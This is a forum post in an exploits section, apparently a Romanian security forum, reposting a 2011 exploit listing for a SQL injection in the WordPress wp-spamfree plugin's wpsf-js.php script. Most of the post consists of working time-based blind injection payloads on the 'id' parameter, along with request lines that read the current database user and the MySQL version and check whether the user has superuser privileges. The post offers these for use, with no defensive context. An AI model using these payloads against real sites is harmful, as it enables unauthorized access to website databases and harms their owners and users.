Jump to content
Guest expl0iter

WordPress wpsf-js plugin, SQL Injection

By Guest expl0iter, in Exploituri

Recommended Posts

Guest expl0iter

Guest expl0iter

Posted
Posted 
#Exploit Title:[ WordPress wpsf-js plugin, SQL Injection]
#Date: 2011-10-16
#Author: [longrifle0x]
#Version:[3.2.1]
#Tested on:[linux]
#Used: ["sqlmap"]
#SQL Injection
http://<target>/wp-content/plugins/wp-spamfree/js/wpsf-js.php?id=1

#Exploit:id=-1; WAITFOR DELAY '0:0:5';-- or id=-1 AND SLEEP(5)

#[http://<taget>:80/wp-content/plugins/wp-spamfree/js/wpsf-js.php][GET][id=-1][CURRENT_USER()

#http://<target>:80/wp-content/plugins/wp-spamfree/js/wpsf-js.php][GET][id=-1][SELECT (CASE WHEN ((SELECT super_priv FROM
mysql.user WHERE user='None' LIMIT 0,1)='Y') THEN 1 ELSE 0 END)

#http://<target>:80/wp-content/plugins/wp-spamfree/js/wpsf-js.php][GET][id=-1][MID((VERSION()),1,6)


# 1337day.com [2011-10-16]

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...